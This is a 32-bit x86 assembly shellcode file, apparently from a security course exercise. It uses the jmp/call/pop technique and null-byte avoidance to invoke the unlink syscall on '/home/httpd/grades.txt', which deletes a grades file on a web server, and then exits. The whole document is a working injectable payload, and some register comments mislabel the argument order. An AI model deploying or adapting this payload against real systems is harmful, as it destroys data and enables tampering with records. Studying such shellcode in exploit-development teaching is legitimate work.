#include <sys/syscall.h>

#define STRING	"/home/httpd/grades.txt"
#define STRLEN	22
#define ARGV	(STRLEN+1)
#define ENVP	(ARGV+4)

.globl main
	.type	main, @function

 main:
	jmp	calladdr

 popladdr:
	popl	%esi
	movl	%esi,(ARGV)(%esi)	/* set up argv pointer to pathname */
	xorl	%eax,%eax			/* get a 32-bit zero value */
	movb	%al,(STRLEN)(%esi)	/* null-terminate our string */
	movl	%eax,(ENVP)(%esi)	/* set up null envp */

	/* there are 10s and new line characters at the low address space of  %al*/

    add     $5, %al         	/* add 5 low bytes */
    add     $5, %al         	/* add 5 low bytes */
    movl    %esi,%ebx       	/* arg 2: string pathname */
    leal    ARGV(%esi),%ecx     /* arg 2: argv */
    leal    ENVP(%esi),%edx     /* arg 3: envp */
    int $0x80           		/* invoke syscall */


	xorl	%ebx,%ebx			/* syscall arg 2: 0 */
	movl	%ebx,%eax
	inc	%eax					/* syscall arg 1: SYS_exit (1), uses */
								/* mov+inc to avoid null byte */
	int	$0x80					/* invoke call */

 calladdr:
	call	popladdr
	.ascii	STRING
